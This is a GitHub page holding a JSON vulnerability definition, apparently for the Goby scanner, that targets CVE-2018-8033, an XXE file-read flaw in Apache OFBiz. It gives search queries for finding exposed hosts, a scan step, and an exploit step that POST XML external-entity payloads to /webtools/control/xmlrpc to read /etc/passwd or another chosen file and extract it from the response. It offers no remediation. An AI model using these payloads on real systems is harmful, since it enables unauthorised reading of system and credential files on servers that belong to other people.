-
Notifications
You must be signed in to change notification settings - Fork 33
/
Copy pathApache-OFBiz-XXE-File-Read-(CVE-2018-8033).json
101 lines (101 loc) · 3.23 KB
/
Apache-OFBiz-XXE-File-Read-(CVE-2018-8033).json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
{
"Name": "Apache OFBiz XXE File Read (CVE-2018-8033)",
"Description": "In Apache OFBiz 16.11.01 to 16.11.04, the OFBiz HTTP engine (org.apache.ofbiz.service.engine.HttpEngine.java) handles requests for HTTP services via the /webtools/control/httpService endpoint. Both POST and GET requests to the httpService endpoint may contain three parameters: serviceName, serviceMode, and serviceContext. The exploitation occurs by having DOCTYPEs pointing to external references that trigger a payload that returns secret information from the host.",
"Product": "Apache-OFBiz",
"Homepage": "https://ofbiz.apache.org/",
"DisclosureDate": "2018-12-13",
"Author": "[email protected]",
"GifAddress": "https://raw.githubusercontent.com/gobysec/GobyVuls/master/Apache%20OFBiz/CVE-2018-8033/CVE-2018-8033.gif",
"FofaQuery": "header=\"Set-Cookie: OFBiz.Visitor\"",
"GobyQuery": "header=\"Set-Cookie: OFBiz.Visitor\"",
"Level": "2",
"Impact": "",
"Recommendation": "",
"References": [
"https://lists.apache.org/thread.html/e8fb551e86e901932081f81ee9985bb72052b4d412f23d89b1282777@%3Cuser.ofbiz.apache.org%3E",
"https://nvd.nist.gov/vuln/detail/CVE-2018-8033",
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8033"
],
"HasExp": true,
"ExpParams": [
{
"name": "file",
"type": "createSelect",
"value": "/etc/passwd,/etc/hosts",
"show": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"data": "<?xml version=\"1.0\"?><!DOCTYPE x [<!ENTITY disclose SYSTEM \"file://///etc/passwd\">]><methodCall><methodName>&disclose;</methodName></methodCall>",
"data_type": "text",
"follow_redirect": false,
"header": {"Content-Type": "application/xml"},
"method": "POST",
"uri": "/webtools/control/xmlrpc"
},
"ResponseTest": {
"checks": [
{
"bz": "",
"operation": "==",
"type": "item",
"value": "200",
"variable": "$code"
},
{
"bz": "",
"operation": "contains",
"type": "item",
"value": "root:x",
"variable": "$body"
},
{
"bz": "",
"operation": "contains",
"type": "item",
"value": "text/xml",
"variable": "$head"
}
],
"operation": "AND",
"type": "group"
}
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"data": "<?xml version=\"1.0\"?><!DOCTYPE x [<!ENTITY disclose SYSTEM \"file:////{{{file}}}\">]><methodCall><methodName>&disclose;</methodName></methodCall>",
"data_type": "text",
"follow_redirect": false,
"header": {"Content-Type": "application/xml"},
"method": "POST",
"uri": "/webtools/control/xmlrpc"
},
"SetVariable": [
"output|lastbody|regex|(?s)No such service \\[(.*?)\\]</value>"
]
}
],
"Tags": ["fileread"],
"CVEIDs": [
"CVE-2018-8033"
],
"CVSSScore": "7.5",
"AttackSurfaces": {
"Application": ["Apache-OFBiz"],
"Support": null,
"Service": null,
"System": null,
"Hardware": null
},
"Disable": false
}